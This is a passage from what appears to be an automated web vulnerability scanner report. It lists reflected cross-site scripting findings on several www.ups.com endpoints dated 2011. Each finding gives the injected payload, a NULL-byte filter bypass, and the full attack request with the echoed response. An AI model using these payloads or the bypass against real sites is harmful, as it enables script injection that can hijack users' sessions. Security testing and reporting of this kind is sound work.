The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /osa/orderSupplies?loc=en_US%00ca0f2"><script>alert(1)</script>02364017778&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9661


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_ca0f2"><script>alert(1)</script>02364017778&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_ca0f2%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B02364017778%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.451. https://www.ups.com/quantum_services/download [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /quantum_services/download

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %0028dc6</script><script>alert(1)</script>564d2e80867 was submitted in the loc parameter. This input was echoed as 28dc6</script><script>alert(1)</script>564d2e80867 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /quantum_services/download?loc=en_US%0028dc6</script><script>alert(1)</script>564d2e80867&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:22 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15351


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_28dc6</script><script>alert(1)</script>564d2e80867&appid=IOVS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_28dc
...[SNIP]...

1.452. https://www.ups.com/quantum_services/download [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /quantum_services/download

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0065b40"><script>alert(1)</script>7de82a96742 was submitted in the loc parameter. This input was echoed as 65b40"><script>alert(1)</script>7de82a96742 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /quantum_services/download?loc=en_US%0065b40"><script>alert(1)</script>7de82a96742&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:14 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15230


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_65b40"><script>alert(1)</script>7de82a96742&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_65b40%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B7de82a96742%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.453. https://www.ups.com/quantum_services/download [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /quantum_services/download

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00933e4'-alert(1)-'a0dc40a090a was submitted in the loc parameter. This input was echoed as 933e4'-alert(1)-'a0dc40a090a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /quantum_services/download?loc=en_US%00933e4'-alert(1)-'a0dc40a090a&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:16 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14525


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
090a&appid=IOVS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_933e4'-alert(1)-'a0dc40a090a&appid=IOVS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_933e4'-alert(1)-'a0dc40a090a&appid=IOVS';
actionUrl = "/one-to-
...[SNIP]...

1.454. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 524bb"%20a%3db%2057ee68500f4 was submitted in the REST URL parameter 1. This input was echoed as 524bb" a=b 57ee68500f4 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /qvadmin524bb"%20a%3db%2057ee68500f4/admin HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44537


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/qvadmin524bb" a=b 57ee68500f4/admin?appid=CVA">
...[SNIP]...

1.455. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload f8608%0a756b3f1e78a was submitted in the REST URL parameter 1. This input was echoed as f8608
756b3f1e78a
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript rest-of-line comment into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /qvadminf8608%0a756b3f1e78a/admin HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:34 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44436


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/qvadminf8608
756b3f1e78a
/admin?appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/qvadmi
...[SNIP]...

1.456. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8127'%3b5afbf672e81 was submitted in the REST URL parameter 1. This input was echoed as a8127';5afbf672e81 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /qvadmina8127'%3b5afbf672e81/admin HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:32 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44453


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
admin?appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/qvadmina8127';5afbf672e81/admin?appid=CVA';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/qvadmina8127';5afbf672e81/admin?appid=CVA';
actionUrl = "/one-to-
...[SNIP]...

1.457. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 5ce57%0ac1d85533e83 was submitted in the REST URL parameter 2. This input was echoed as 5ce57
c1d85533e83
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript rest-of-line comment into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /qvadmin/admin5ce57%0ac1d85533e83 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:48 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44436


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/qvadmin/admin5ce57
c1d85533e83
?appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/qvadmin/admi
...[SNIP]...

1.458. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c0c8'%3b1919f17d50a was submitted in the REST URL parameter 2. This input was echoed as 6c0c8';1919f17d50a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /qvadmin/admin6c0c8'%3b1919f17d50a HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44453


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/qvadmin/admin6c0c8';1919f17d50a?appid=CVA';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/qvadmin/admin6c0c8';1919f17d50a?appid=CVA';
actionUrl = "/one-to-one/lo
...[SNIP]...

1.459. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4f64"%20a%3db%20aadbdf6cf43 was submitted in the REST URL parameter 2. This input was echoed as d4f64" a=b aadbdf6cf43 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /qvadmin/admind4f64"%20a%3db%20aadbdf6cf43 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:44 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44537


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/qvadmin/admind4f64" a=b aadbdf6cf43?appid=CVA">
...[SNIP]...

1.460. https://www.ups.com/qvadmin/admin [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0055a41"><script>alert(1)</script>778c84f00ce was submitted in the loc parameter. This input was echoed as 55a41"><script>alert(1)</script>778c84f00ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /qvadmin/admin?loc=en_US%0055a41"><script>alert(1)</script>778c84f00ce&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:09 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15218


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_55a41"><script>alert(1)</script>778c84f00ce&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_55a41%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B778c84f00ce%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.461. https://www.ups.com/qvadmin/admin [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %008f676</script><script>alert(1)</script>17aa4dd78c7 was submitted in the loc parameter. This input was echoed as 8f676</script><script>alert(1)</script>17aa4dd78c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /qvadmin/admin?loc=en_US%008f676</script><script>alert(1)</script>17aa4dd78c7&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:19 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15339


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_8f676</script><script>alert(1)</script>17aa4dd78c7&appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_8f676
...[SNIP]...

1.462. https://www.ups.com/qvadmin/admin [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00d747f'-alert(1)-'1b60fb3e3a6 was submitted in the loc parameter. This input was echoed as d747f'-alert(1)-'1b60fb3e3a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /qvadmin/admin?loc=en_US%00d747f'-alert(1)-'1b60fb3e3a6&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14513


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
3e3a6&appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_d747f'-alert(1)-'1b60fb3e3a6&appid=CVA';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_d747f'-alert(1)-'1b60fb3e3a6&appid=CVA';
actionUrl = "/one-to-on
...[SNIP]...

1.463. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /sharp/prefapp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dddb"%20a%3db%204ee8ba2c754 was submitted in the REST URL parameter 2. This input was echoed as 6dddb" a=b 4ee8ba2c754 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /sharp/prefapp6dddb"%20a%3db%204ee8ba2c754 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44452


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/sharp/prefapp6dddb" a=b 4ee8ba2c754">
...[SNIP]...

1.464. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /sharp/prefapp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 359b8%0ad79fe9d4b74 was submitted in the REST URL parameter 2. This input was echoed as 359b8
d79fe9d4b74
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /sharp/prefapp359b8%0ad79fe9d4b74 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44351


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/sharp/prefapp359b8
d79fe9d4b74
';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/sharp/prefapp359b8
d79
...[SNIP]...

1.465. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /sharp/prefapp

Issue detail

